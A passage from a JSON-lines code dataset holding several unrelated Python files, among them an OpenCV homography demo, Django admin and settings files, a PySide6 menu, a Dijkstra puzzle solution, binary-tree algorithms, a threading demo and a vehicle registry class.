self.create_model()\n rmse_cv.append(self.metrics['cross_validation']['RMSE'])\n r2_cv.append(self.metrics['cross_validation']['R2'])\n rmse_ve.append(self.metrics['validation']['RMSE'])\n r2_ve.append(self.metrics['validation']['R2'])\n else:\n raise ValueError(\"target should be 'cv' or 'pred'.\")\n \n self.components = default\n cross_validation = {'RMSE': rmse_cv, 'R2': r2_cv}\n\n \n if target == 'pred':\n validation = {'RMSE': rmse_ve, 'R2': r2_ve}\n performance = {'cross_validation': cross_validation, 'validation': validation, 'components': components_for_test }\n \n else:\n performance = {'cross_validation': cross_validation, 'components': components_for_test }\n\n\n self._perfomance = performance\n \n \n \n def create_model(self):\n \n # this function should be used to calibrate, cross-validate and validate with one command\n\n self.calibrate()\n self.cross_validate()\n self.validate()\n\n","repo_name":"dijsilva/spectroscopy-analysis-tool","sub_path":"algorithms/regression/plsr.py","file_name":"plsr.py","file_ext":"py","file_size_in_byte":9369,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"24799842840","text":"import cv2 as cv \nimport numpy as np \nimport matplotlib.pyplot as plt \n\nimg1 = cv.imread(\"pic/box.png\", cv.IMREAD_COLOR)\nimg2 = cv.imread(\"pic/box_in_scene.png\", cv.IMREAD_COLOR)\n\nimg1_gray = cv.cvtColor(img1, cv.COLOR_BGR2GRAY)\nimg2_gray = cv.cvtColor(img2, cv.COLOR_BGR2GRAY)\n\nsurf = cv.xfeatures2d.SURF_create(400)\n\nkp1, des1 = surf.detectAndCompute(img1_gray, None)\nkp2, des2 = surf.detectAndCompute(img2_gray, None)\n\nFLANN_INDEX_KDTREE = 1\nindex_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)\nsearch_params = dict(checks = 50)\nflann = cv.FlannBasedMatcher(index_params, search_params)\n\nmatches = flann.knnMatch(des1, des2, k = 2)\ngood = []\nfor m, n in matches:\n if m.distance < 0.7 * n.distance:\n good.append(m)\n\nMIN_MATCH_COUNT = 10\nif len(good) > MIN_MATCH_COUNT:\n # frame1_pts = np.float32([kp1[m.queryIdx].pt for m in good]).reshape(-1, 1, 2)\n # frame2_pts = np.float32([kp2[m.trainIdx].pt for m in good]).reshape(-1, 1, 2)\n # M, mask = cv.findHomography(frame1_pts, frame2_pts, cv.RANSAC, 5.0)\n img1_pts = np.float32([kp1[m.queryIdx].pt for m in good]).reshape(-1, 1, 2)\n img2_pts = np.float32([kp2[m.trainIdx].pt for m in good]).reshape(-1, 1, 2)\n M, mask = cv.findHomography(img1_pts, img2_pts, cv.RANSAC, 5.0)\n rows, cols, ch = img2.shape\n warp = cv.warpPerspective(img1, M, (cols, rows))\n\n sub = cv.absdiff(img2, warp)\n\n plt.subplot(221), plt.title(\"img1\")\n plt.imshow(img1[:, :, [2, 1, 0]])\n\n plt.subplot(222), plt.title(\"img2\")\n plt.imshow(img2[:, :, [2, 1, 0]])\n\n plt.subplot(223), plt.title(\"absdiff\")\n plt.imshow(sub[:, :, [2, 1, 0]])\n\n plt.subplot(224), plt.title(\"warp\")\n plt.imshow(warp[:, :, [2, 1, 0]])\n plt.show()\n\n\n\n","repo_name":"weizy2018/learnopencv","sub_path":"perspective/perspective_transform2.py","file_name":"perspective_transform2.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28949563275","text":"#-*-coding:utf8-*-\nfrom django.contrib import admin\nfrom .models import Category \n# Register your models here.\n\n\nclass CategoryAdmin(admin.ModelAdmin):\n\tlist_display = ('id','name','timestamp')\n\tlist_filter = ['timestamp']\n\tsearch_fields = ['name','id']\n\nadmin.site.register(Category,CategoryAdmin)\n","repo_name":"zhxhdean/insurance","sub_path":"openapi/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"73201054546","text":"from UIs.Estado.PesquisaEstado import *\r\nfrom UIs.Cidade.PesquisaCidade import *\r\nfrom UIs.Genero.PesquisaGenero import *\r\nfrom UIs.Artista.PesquisaArtista import *\r\nfrom UIs.TipoEvento.PesquisaTipoEvento import *\r\nfrom UIs.Evento.PesquisaEvento import *\r\nfrom UIs.Preco.PesquisaPreco import *\r\nfrom UIs.Apresentacao.PesquisaApresentacao import *\r\nfrom UIs.TipoDespesa.PesquisaTipoDespesa import *\r\nfrom UIs.Despesa.PesquisaDespesa import *\r\nfrom UIs.Receita.PesquisaReceita import *\r\nfrom UIs.MainMenu_ui import *\r\nfrom PySide6.QtCore import Slot\r\n\r\n\r\nclass MainMenu(QMainWindow):\r\n def __init__(self, parent=None):\r\n super(MainMenu, self).__init__(parent)\r\n\r\n self.ui = Ui_MainWindow()\r\n self.ui.setupUi(self)\r\n\r\n self.ui.actionEstado.triggered.connect(self.exibe_pesquisa_estado)\r\n self.ui.actionCidade.triggered.connect(self.exibe_pesquisa_cidade)\r\n self.ui.actionGenero.triggered.connect(self.exibe_pesquisa_genero)\r\n self.ui.actionArtista.triggered.connect(self.exibe_pesquisa_artista)\r\n self.ui.actionTipoEvento.triggered.connect(self.exibe_pesquisa_tipo_evento)\r\n self.ui.actionEvento.triggered.connect(self.exibe_pesquisa_evento)\r\n self.ui.actionPreco.triggered.connect(self.exibe_pesquisa_preco)\r\n self.ui.actionApresentacao.triggered.connect(self.exibe_pesquisa_apresentacao)\r\n self.ui.actionTipoDespesa.triggered.connect(self.exibe_pesquisa_tipo_despesa)\r\n self.ui.actionDespesa.triggered.connect(self.exibe_pesquisa_despesa)\r\n self.ui.actionReceita.triggered.connect(self.exibe_pesquisa_receita)\r\n\r\n @Slot()\r\n def exibe_pesquisa_estado(self):\r\n self.pesquisa_estado = PesquisaEstado(parent=None)\r\n self.pesquisa_estado.show()\r\n\r\n @Slot()\r\n def exibe_pesquisa_cidade(self):\r\n self.pesquisa_cidade = PesquisaCidade(parent=None)\r\n self.pesquisa_cidade.show()\r\n\r\n @Slot()\r\n def exibe_pesquisa_genero(self):\r\n self.pesquisa_genero = PesquisaGenero(parent=None)\r\n self.pesquisa_genero.show()\r\n\r\n @Slot()\r\n def exibe_pesquisa_artista(self):\r\n self.pesquisa_artista = PesquisaArtista(parent=None)\r\n self.pesquisa_artista.show()\r\n\r\n @Slot()\r\n def exibe_pesquisa_tipo_evento(self):\r\n self.pesquisa_tipo_evento = PesquisaTipoEvento(parent=None)\r\n self.pesquisa_tipo_evento.show()\r\n\r\n @Slot()\r\n def exibe_pesquisa_evento(self):\r\n self.pesquisa_evento = PesquisaEvento(parent=None)\r\n self.pesquisa_evento.show()\r\n\r\n @Slot()\r\n def exibe_pesquisa_preco(self):\r\n self.pesquisa_preco = PesquisaPreco(parent=None)\r\n self.pesquisa_preco.show()\r\n\r\n @Slot()\r\n def exibe_pesquisa_apresentacao(self):\r\n self.pesquisa_apresentacao = PesquisaApresentacao(parent=None)\r\n self.pesquisa_apresentacao.show()\r\n\r\n @Slot()\r\n def exibe_pesquisa_tipo_despesa(self):\r\n self.pesquisa_tipo_despesa = PesquisaTipoDespesa(parent=None)\r\n self.pesquisa_tipo_despesa.show()\r\n\r\n @Slot()\r\n def exibe_pesquisa_despesa(self):\r\n self.pesquisa_despesa = PesquisaDespesa(parent=None)\r\n self.pesquisa_despesa.show()\r\n\r\n @Slot()\r\n def exibe_pesquisa_receita(self):\r\n self.pesquisa_receita = PesquisaReceita(parent=None)\r\n self.pesquisa_receita.show()\r\n","repo_name":"teiGustavo/eventos-pyside","sub_path":"UIs/MainMenu.py","file_name":"MainMenu.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"2329538477","text":"import os\n\nfrom config import UPLOAD_FOLDER\nfrom mimetypes import guess_extension\n\nclass ProfilePhoto:\n def __init__(self, file, user_id):\n self.file = file\n self.user_id = user_id\n \n def file_rename(self):\n ALLOWED_MIME_TYPES = ['image/jpeg', 'image/png', 'image/gif']\n mime_type = self.file.mimetype\n \n if not mime_type in ALLOWED_MIME_TYPES:\n raise ValueError('O formato do arquivo de imagem deve ser .jpeg, .png ou .gif')\n ext = guess_extension(mime_type)\n return f\"photo-userId_{self.user_id}{ext}\"\n\n def save_file(self):\n filename = self.file_rename()\n self.file.save(os.path.join(UPLOAD_FOLDER, filename))\n \n return filename\n","repo_name":"VitorValandro/Vitae","sub_path":"server/utils/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"7159099913","text":"import heapq\nINF = int(10e9)\ntest = int(input())\n\ndef dijkstra(start, distance, graph):\n queue = []\n distance[start] = 0\n heapq.heappush(queue, (distance[start], start))\n while queue:\n dis, now = heapq.heappop(queue)\n if(distance[now] < dis):\n continue\n \n for i in graph[now]:\n cost = distance[now] + i[0]\n if distance[i[1]] > cost:\n distance[i[1]] = cost\n heapq.heappush(queue, (cost, i[1]))\n \n \nfor _ in range(test):\n n, d, c = map(int, input().split()) # n 컴퓨터개수, d 의존성개수, c 해킹당한 컴퓨터\n graph = [[] for _ in range(n+1)]\n distance = [INF] * (n+1)\n for _ in range(d):\n com1, com2, time = map(int, input().split())\n graph[com2].append([time, com1])\n dijkstra(c, distance, graph)\n hackedcom = []\n for i in range(len(distance)):\n if(distance[i] != INF):\n hackedcom.append(distance[i])\n \n print(len(hackedcom), end=' ') # 감염되는 총 컴퓨터수\n print(max(hackedcom)) # 마지막 컴퓨터가 감염되기까지 걸리는 시간","repo_name":"rhkdguskim/Study","sub_path":"알고리즘/이것이코딩테스트다스터디/다익스트라/해킹.py","file_name":"해킹.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6499417766","text":"import contextlib\nimport os\nimport sys\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nfrom pathlib import Path\n\nBASE_DIR = Path(__file__).parent.parent\nsys.path.insert(0, os.path.join(BASE_DIR, \"apps\"))\nsys.path.insert(0, os.path.join(BASE_DIR.parent, \"api\"))\nsys.path.insert(0, os.path.join(BASE_DIR.parent, \"api/endpoints/v1\"))\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = os.environ.get(\"SECRET_KEY\", None)\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nALLOWED_HOSTS = [\"*\"]\n\n\n# Application definition\n\nINSTALLED_APPS = [\n \"django.contrib.auth\",\n \"django.contrib.contenttypes\",\n \"django.contrib.staticfiles\",\n \"apiblueprint_view\",\n \"pipeline\",\n \"dc_design_system\",\n \"dc_utils\",\n]\nPROJECT_APPS = [\"api_docs.v1\"]\nINSTALLED_APPS += PROJECT_APPS\n\nMIDDLEWARE = [\n \"django.middleware.security.SecurityMiddleware\",\n \"whitenoise.middleware.WhiteNoiseMiddleware\",\n \"django.contrib.sessions.middleware.SessionMiddleware\",\n \"django.middleware.common.CommonMiddleware\",\n \"django.middleware.csrf.CsrfViewMiddleware\",\n \"django.contrib.auth.middleware.AuthenticationMiddleware\",\n \"django.contrib.messages.middleware.MessageMiddleware\",\n \"django.middleware.clickjacking.XFrameOptionsMiddleware\",\n]\n\nROOT_URLCONF = \"frontend.urls\"\n\nTEMPLATES = [\n {\n \"BACKEND\": \"django.template.backends.django.DjangoTemplates\",\n \"DIRS\": [os.path.join(BASE_DIR, \"templates\")],\n \"APP_DIRS\": True,\n \"OPTIONS\": {\n \"context_processors\": [\n \"django.template.context_processors.debug\",\n \"django.template.context_processors.request\",\n \"django.contrib.auth.context_processors.auth\",\n \"django.contrib.messages.context_processors.messages\",\n ]\n },\n }\n]\n\nWSGI_APPLICATION = \"frontend.wsgi.application\"\n\n\n# Database\n# https://docs.djangoproject.com/en/1.11/ref/settings/#databases\n\nDATABASES = {\"default\": {\"ENGINE\": \"django.db.backends.sqlite3\"}}\n\n\n# Password validation\n# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n \"NAME\": \"django.contrib.auth.password_validation.UserAttributeSimilarityValidator\"\n },\n {\"NAME\": \"django.contrib.auth.password_validation.MinimumLengthValidator\"},\n {\"NAME\": \"django.contrib.auth.password_validation.CommonPasswordValidator\"},\n {\n \"NAME\": \"django.contrib.auth.password_validation.NumericPasswordValidator\"\n },\n]\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.11/topics/i18n/\n\nLANGUAGE_CODE = \"en-us\"\n\nTIME_ZONE = \"UTC\"\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.11/howto/static-files/\n\nfrom dc_utils.settings.pipeline import * # noqa\nfrom dc_utils.settings.pipeline import get_pipeline_settings # noqa\n\nPIPELINE = get_pipeline_settings(extra_css=[\"scss/styles.scss\"])\n\nimport dc_design_system # noqa\n\nPIPELINE[\"SASS_ARGUMENTS\"] += (\n \" -I \" + dc_design_system.DC_SYSTEM_PATH + \"/system\"\n)\n\nSASS_INCLUDE_PATHS = [dc_design_system.DC_SYSTEM_PATH + \"/system\"]\nSTATIC_ROOT = os.path.join(BASE_DIR, \"static_files\")\nSTATIC_URL = \"/static/\"\nSTATICFILES_DIRS = (os.path.join(BASE_DIR, \"assets\"),)\n\nSITE_TITLE = \"Democracy Club Developers\"\n\n\n# CorsMiddleware config\nCORS_ORIGIN_ALLOW_ALL = True\nCORS_URLS_REGEX = r\"^/api/.*$\"\nCORS_ALLOW_METHODS = (\"GET\", \"OPTIONS\")\n\nfrom .constants import * # noqa\n\n\nsentry_dsn = os.environ.get(\"SENTRY_DSN\", None)\nif sentry_dsn:\n import sentry_sdk\n from sentry_sdk.integrations.django import DjangoIntegration\n\n sentry_sdk.init(\n dsn=sentry_dsn,\n integrations=[DjangoIntegration()],\n traces_sample_rate=0,\n send_default_pii=False,\n )\n\n\n# Lambda: https://docs.aws.amazon.com/lambda/latest/dg/configuration-envvars.html#configuration-envvars-runtime\n# CircleCI: https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables\n# Make: https://docs.oracle.com/cd/E19504-01/802-5880/makeattapp-21/index.html\ndef is_local_dev():\n vars_to_check = [\"AWS_LAMBDA_FUNCTION_NAME\", \"CI\", \"MAKEFLAGS\"]\n return not any(ev in os.environ for ev in vars_to_check)\n\n\n# .local.py overrides all the common settings.\nif is_local_dev():\n print(\n \"Found nothing to indicate this is NOT an local development environment; including settings/local.py\"\n ) # FIXME: log?\n with contextlib.suppress(ImportError):\n from .local import * # noqa\n","repo_name":"DemocracyClub/aggregator-api","sub_path":"frontend/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4580,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"4598604517","text":"def sokhonggiam(n):\n\tfor i in range(len(n)-1):\n\t\tif n[i+1] < n[i]:\n\t\t\treturn 0\n\treturn 1\n\ntest = int(input())\nwhile (test>0) :\n\tn = input()\n\tcheck = sokhonggiam(n)\n\tif check==1: print(\"YES\")\n\telse: print(\"NO\")\n\ttest -= 1","repo_name":"HongDuy119/CODE_PYTHON","sub_path":"PY01015 - SỐ KHÔNG GIẢM.py","file_name":"PY01015 - SỐ KHÔNG GIẢM.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28799577023","text":"from shutil import copyfile\nfrom shutil import copytree\nfrom time import sleep\n\nfrom constants import source_config_folder_list, source_config_file_list\nimport sys\n\npath_to_be_restored_folder = sys.argv[1]\nprint(\"Path to the target snapshot to be restored: \" + path_to_be_restored_folder)\n\n# whole folder\nwith open(source_config_folder_list) as file:\n lines = file.readlines()\n for original_src in lines:\n original_src = original_src.rstrip()\n restore_from = path_to_be_restored_folder + \"/\" + original_src.split(\"/\")[-1]\n\n print(\"restore config snapshot. from: \" + restore_from + \", to: \" + original_src)\n # suppose to overwrite existing, so set to True\n copytree(restore_from, original_src, dirs_exist_ok=True)\n\n\n# single files\nwith open(source_config_file_list) as file:\n lines = file.readlines()\n for original_src in lines:\n original_src = original_src.rstrip()\n restore_from = path_to_be_restored_folder + \"/\" + original_src.split(\"/\")[-1]\n\n print(\"restore config snapshot. from: \" + restore_from + \", to: \" + original_src)\n copyfile(restore_from, original_src)\n","repo_name":"keypointt/ConfigSnapshot","sub_path":"restore_snapshot_config.py","file_name":"restore_snapshot_config.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23890429162","text":"import logging\nimport sys\nfrom typing import Callable, Optional\n\nimport sqlalchemy\n\nfrom .exceptions import DBNotPreparedError\n\n\nlogger = logging.getLogger('database')\n\n_DEFAULT_CONNECTION_PARAMS = {}\n\ntry:\n import contextvars\n CURRENT_DATABASE_VAR = contextvars.ContextVar(\"dysql_current_database\", default='')\nexcept ImportError:\n CURRENT_DATABASE_VAR = None\n\n\ndef set_database_init_hook(hook_method: Callable[[Optional[str], sqlalchemy.engine.Engine], None]) -> None:\n \"\"\"\n Sets an initialization hook whenever a new database is initialized. This method will receive the database name\n (may be none) and the sqlalchemy engine as parameters.\n\n :param hook_method: the hook method\n \"\"\"\n Database.set_init_hook(hook_method)\n\n\ndef is_set_current_database_supported() -> bool:\n \"\"\"\n Determines if the set_current_database method is available on this python runtime.\n :return: True if available, False otherwise\n \"\"\"\n return bool(CURRENT_DATABASE_VAR)\n\n\ndef set_current_database(database: str) -> None:\n \"\"\"\n Sets the current database, may be used for multitenancy. This is only supported on Python 3.7+. This uses\n contextvars internally to set the name for the current async context.\n :param database: the database name to use for this async context\n \"\"\"\n if not CURRENT_DATABASE_VAR:\n raise DBNotPreparedError(\n f'Cannot set the current database on Python \"{sys.version}\", please upgrade your Python version'\n )\n CURRENT_DATABASE_VAR.set(database)\n logger.debug(f'Set current database to {database}')\n\n\ndef reset_current_database() -> None:\n \"\"\"\n Helper method to reset the current database to the default. Internally, this calls `set_current_database` with\n an empty string.\n \"\"\"\n set_current_database('')\n\n\ndef _get_current_database() -> str:\n \"\"\"\n The current database name, using contextvars (if on python 3.7+) or the default database name.\n :return: The current database name\n \"\"\"\n database: Optional[str] = None\n if CURRENT_DATABASE_VAR:\n database = CURRENT_DATABASE_VAR.get()\n if not database:\n database = _DEFAULT_CONNECTION_PARAMS.get('database')\n return database\n\n\ndef _validate_param(name: str, value: str) -> None:\n if not value:\n raise DBNotPreparedError(f'Database parameter \"{name}\" is not set or empty and is required')\n\n\ndef set_default_connection_parameters(\n host: str,\n user: str,\n password: str,\n database: str,\n port: int = 3306,\n pool_size: int = 10,\n pool_recycle: int = 3600,\n echo_queries: bool = False,\n charset: str = 'utf8'\n): # pylint: disable=too-many-arguments,unused-argument\n \"\"\"\n Initializes the parameters to use when connecting to the database. This is a subset of the parameters\n used by sqlalchemy. These may be overridden by parameters provided in the QueryData, hence the \"default\".\n\n :param host: the db host to try to connect to\n :param user: user to connect to the database with\n :param password: password for given user\n :param database: database to connect to\n :param port: the port to connect to (default 3306)\n :param pool_size: number of connections to maintain in the connection pool (default 10)\n :param pool_recycle: amount of time to wait between resetting the connections\n in the pool (default 3600)\n :param echo_queries: this tells sqlalchemy to print the queries when set to True (default false)\n :param charset: the charset for the sql engine to initialize with. (default utf8)\n :exception DBNotPrepareError: happens when required parameters are missing\n \"\"\"\n _validate_param('host', host)\n _validate_param('user', user)\n _validate_param('password', password)\n _validate_param('database', database)\n\n _DEFAULT_CONNECTION_PARAMS.update(locals())\n\n\nclass Database:\n # pylint: disable=too-few-public-methods\n\n def __init__(self, database: Optional[str]) -> None:\n self.database = database\n # Engine is lazy-initialized\n self._engine: Optional[sqlalchemy.engine.Engine] = None\n\n @classmethod\n def set_init_hook(\n cls,\n hook_method: Callable[[Optional[str], sqlalchemy.engine.Engine], None],\n ) -> None:\n cls.hook_method = hook_method\n\n @property\n def engine(self) -> sqlalchemy.engine.Engine:\n if not self._engine:\n user = _DEFAULT_CONNECTION_PARAMS.get('user')\n password = _DEFAULT_CONNECTION_PARAMS.get('password')\n host = _DEFAULT_CONNECTION_PARAMS.get('host')\n port = _DEFAULT_CONNECTION_PARAMS.get('port')\n charset = _DEFAULT_CONNECTION_PARAMS.get('charset')\n\n url = f'mysql+mysqlconnector://{user}:{password}@{host}:{port}/{self.database}?charset={charset}'\n self._engine = sqlalchemy.create_engine(\n url,\n pool_recycle=_DEFAULT_CONNECTION_PARAMS.get('pool_recycle'),\n pool_size=_DEFAULT_CONNECTION_PARAMS.get('pool_size'),\n echo=_DEFAULT_CONNECTION_PARAMS.get('echo_queries'),\n pool_pre_ping=True,\n )\n hook_method: Optional[Callable[[Optional[str], sqlalchemy.engine.Engine], None]] = \\\n getattr(self.__class__, 'hook_method', None)\n if hook_method:\n hook_method(self.database, self._engine)\n\n return self._engine\n\n\nclass DatabaseContainer(dict):\n \"\"\"\n Implementation of a dictionary that always provides a Database class instance, even if the key is missing.\n \"\"\"\n def __getitem__(self, database: Optional[str]) -> Database:\n \"\"\"\n Override getitem to always return an instance of a database, which includes a lazy-initialized engine.\n This also ensures that the database parameters have been initialized before attempting to retrieve a database.\n :param database: the database name (may be null for the default database)\n :return: a database instance\n :raises DBNotPreparedError: when set_default_connection_parameters has not yet been called\n \"\"\"\n if not _DEFAULT_CONNECTION_PARAMS:\n raise DBNotPreparedError(\n 'Unable to connect to a database, set_default_connection_parameters must first be called'\n )\n\n if not super().__contains__(database):\n super().__setitem__(database, Database(database))\n return super().__getitem__(database)\n\n @property\n def current_database(self) -> Database:\n \"\"\"\n The current database instance, retrieved using contextvars (if python 3.7+) or the default database.\n \"\"\"\n # pylint: disable=unnecessary-dunder-call\n return self.__getitem__(_get_current_database())\n\n\nclass DatabaseContainerSingleton(DatabaseContainer):\n \"\"\"\n All instantiations of this class will result in the same instance every time due to the override of\n the __new__ method.\n \"\"\"\n def __new__(cls, *args, **kwargs) -> 'DatabaseContainer':\n instance = cls.__dict__.get(\"__instance__\")\n if instance is not None:\n return instance\n cls.__instance__ = instance = DatabaseContainer.__new__(cls)\n instance.__init__(*args, **kwargs)\n return instance\n","repo_name":"adobe/dy-sql","sub_path":"dysql/databases.py","file_name":"databases.py","file_ext":"py","file_size_in_byte":7335,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"14096120417","text":"from collections import deque\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n def create_tree(self, levelorder):\n if not levelorder:\n return None\n root_value = levelorder.pop(0)\n root = TreeNode(root_value) if root_value is not None else None\n queue = deque([root])\n\n while levelorder:\n current_node = queue.popleft()\n\n # for each node we will have two children in level order list\n left_value = levelorder.pop(0)\n if left_value is not None:\n left_node = TreeNode(left_value)\n current_node.left = left_node\n queue.append(left_node)\n\n if levelorder: # if there is still values left\n right_value = levelorder.pop(0)\n if right_value is not None:\n right_node = TreeNode(right_value)\n current_node.right = right_node\n queue.append(right_node)\n\n return root\n \n def __repr__(self, level=0):\n ret = \"\\t\"*level + repr(self.val) + \"\\n\"\n if self.left:\n ret += self.left.__repr__(level + 1)\n if self.right:\n ret += self.right.__repr__(level + 1)\n return ret\n\ndef build_tree(nodes, i, n):\n root = None\n if (i < n) and nodes[i] is not None:\n root = TreeNode(nodes[i])\n root.left = build_tree(nodes, 2*i + 1, n)\n root.right = build_tree(nodes, 2*i + 2, n)\n return root\n\n# Recursive solution\nclass SolutionRecursive:\n def longestZigZag(self, root):\n self.max_length = 0\n self.dfs(root)\n return self.max_length\n\n def dfs(self, node):\n if node is None:\n return [-1, -1]\n\n left = self.dfs(node.left)\n right = self.dfs(node.right)\n\n self.max_length = max(self.max_length, left[1] + 1, right[0] + 1)\n\n return [left[1] + 1, right[0] + 1]\n\n# Iterative solution 1\nclass SolutionIterative1:\n def longestZigZag(self, root):\n stack = [(root, False, 0)]\n max_length = 0\n\n while stack:\n node, is_left, length = stack.pop()\n max_length = max(max_length, length)\n \n if node.left:\n stack.append((node.left, False, length + 1 if is_left else 1))\n if node.right:\n stack.append((node.right, True, length + 1 if not is_left else 1))\n\n return max_length\n\n# Iterative solution 2\nclass SolutionIterative2:\n def longestZigZag(self, root):\n stack = [(root, 's', 0)]\n maxsum = 0\n while stack:\n node, dir, sum= stack.pop()\n lsum = sum\n rsum = sum\n if node:\n if node.right:\n if dir == 's' or dir == 'l':\n rsum = sum + 1\n else: \n rsum = 1\n newDir = 'r'\n stack.append((node.right, newDir, rsum))\n if node.left:\n if dir == 's' or dir == 'r':\n lsum = sum + 1\n else: \n lsum = 1\n newDir = 'l'\n stack.append((node.left, newDir, lsum))\n maxsum = max(maxsum, lsum, rsum, sum)\n return maxsum\n \nclass Solution:\n def find_path_sum(self, root, target):\n self.cache = {0: 1} \n self.count = 0\n self.helper(root, target, 0)\n return self.count\n def helper(self, root, target, sum):\n if root == None:\n return\n \n sum += root.val\n\n self.count += self.cache.get(sum - target, 0)\n self.cache[sum] = self.cache.get(sum, 0) + 1\n\n self.helper(root.left, target, sum)\n self.helper(root.right, target, sum)\n\n if self.cache[sum] == 1:\n del self.cache[sum] # Completely remove from cache if count becomes 0\n else:\n self.cache[sum] -= 1\n\n\nif __name__ == \"__main__\":\n nodes = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n root = build_tree(nodes, 0, len(nodes))\n \n recursive_solution = SolutionRecursive().longestZigZag(root)\n iterative_solution_1 = SolutionIterative1().longestZigZag(root)\n iterative_solution_2 = SolutionIterative2().longestZigZag(root)\n\n print(f\"Recursive Solution: {recursive_solution}\")\n print(f\"Iterative Solution 1: {iterative_solution_1}\")\n print(f\"Iterative Solution 2: {iterative_solution_2}\")\n root = TreeNode().create_tree([10, 5, -3, 3, 2, None, 11, 3, -2, None, 1])\n targetSum = 8\n print(Solution().find_path_sum(root, 8))\n","repo_name":"dvc0310/Interview-prep-stuff","sub_path":"anki/tree_7_19_23.py","file_name":"tree_7_19_23.py","file_ext":"py","file_size_in_byte":4714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27606204250","text":"# -*- coding: utf-8 -*-\r\n# @Time : 2018/9/21 17:37\r\n# @Author : fovegage\r\n# @Email : fovegage@gmail.com\r\n# @File : thread_syn.py\r\n# @Software: PyCharm\r\n\r\nimport threading\r\n\r\n\r\n# 为实现同步 一边锁 一边释放\r\nclass My_thread_1(threading.Thread):\r\n def run(self):\r\n while True:\r\n if l1.acquire():\r\n print(\"task1\")\r\n l2.release()\r\n\r\n\r\nclass My_thread_2(threading.Thread):\r\n def run(self):\r\n while True:\r\n if l2.acquire():\r\n print(\"task2\")\r\n l3.release()\r\n\r\n\r\nclass My_thread_3(threading.Thread):\r\n def run(self):\r\n while True:\r\n if l3.acquire():\r\n print(\"task3\")\r\n l1.release()\r\n\r\n\r\nif __name__ == '__main__':\r\n l1 = threading.Lock()\r\n l2 = threading.Lock()\r\n l2.acquire()\r\n l3 = threading.Lock()\r\n l3.acquire()\r\n\r\n t1 = My_thread_1()\r\n t2 = My_thread_2()\r\n t3 = My_thread_3()\r\n t1.start()\r\n t2.start()\r\n t3.start()\r\n","repo_name":"fovegage/learn-python","sub_path":"Python编程/系统编程/线程/thread_syn.py","file_name":"thread_syn.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"23144215176","text":"import string\nimport random\n\nfrom data.VehicleData import VEHICLE_DATA\n\n\nclass VehicleInfo:\n brand: str\n electric: bool\n catalogue_price: int\n\n def __init__(self, brand, electric, catalogue_price):\n self.brand = brand\n self.electric = electric\n self.catalogue_price = catalogue_price\n\n def determinate_tax_percentage(self):\n if self.electric:\n tax_percentage = 0.02\n else:\n tax_percentage = 0.05\n\n return tax_percentage\n\n def compute_tax(self):\n return self.determinate_tax_percentage() * self.catalogue_price\n\n def print(self):\n print(f\"Brand: {self.brand}\")\n print(f\"Electric: {self.electric}\")\n print(f\"Payable tax: {self.compute_tax()}\")\n\n\nclass Vehicle:\n id_: str\n license_plate: str\n info: VehicleInfo\n\n def __init__(self, id_, license_plate, info):\n self.id_ = id_\n self.license_plate = license_plate\n self.info = info\n\n def print(self):\n print(f\"Id: {self.id_}\")\n print(f\"License plate: {self.license_plate}\")\n self.info.print()\n\n\nclass VehicleRegistry:\n\n def __init__(self):\n self.vehicle_info = {}\n\n for vehicle in VEHICLE_DATA:\n self.add_vehicle_info(**vehicle)\n\n def add_vehicle_info(self, brand, electric, catalogue_price):\n self.vehicle_info[brand] = VehicleInfo(brand, electric, catalogue_price)\n\n @staticmethod\n def generate_vehicle_id(length):\n return ''.join(random.choices(string.ascii_uppercase, k=length))\n\n @staticmethod\n def generate_vehicle_license(id_):\n return f\"{id_[:2]}-{''.join(random.choices(string.digits, k=2))}-{''.join(random.choices(string.ascii_uppercase, k=2))}\"\n\n def create_vehicle(self, brand):\n id_ = self.generate_vehicle_id(12)\n license_plate = self.generate_vehicle_license(id_)\n\n return Vehicle(id_, license_plate, self.vehicle_info[brand])\n\n\nclass Application:\n\n @staticmethod\n def register_vehicle(brand: string):\n # create a registry instance\n registry = VehicleRegistry()\n\n vehicle = registry.create_vehicle(brand)\n\n # print out the vehicle information\n vehicle.print()\n\n\nif __name__ == '__main__':\n app = Application()\n 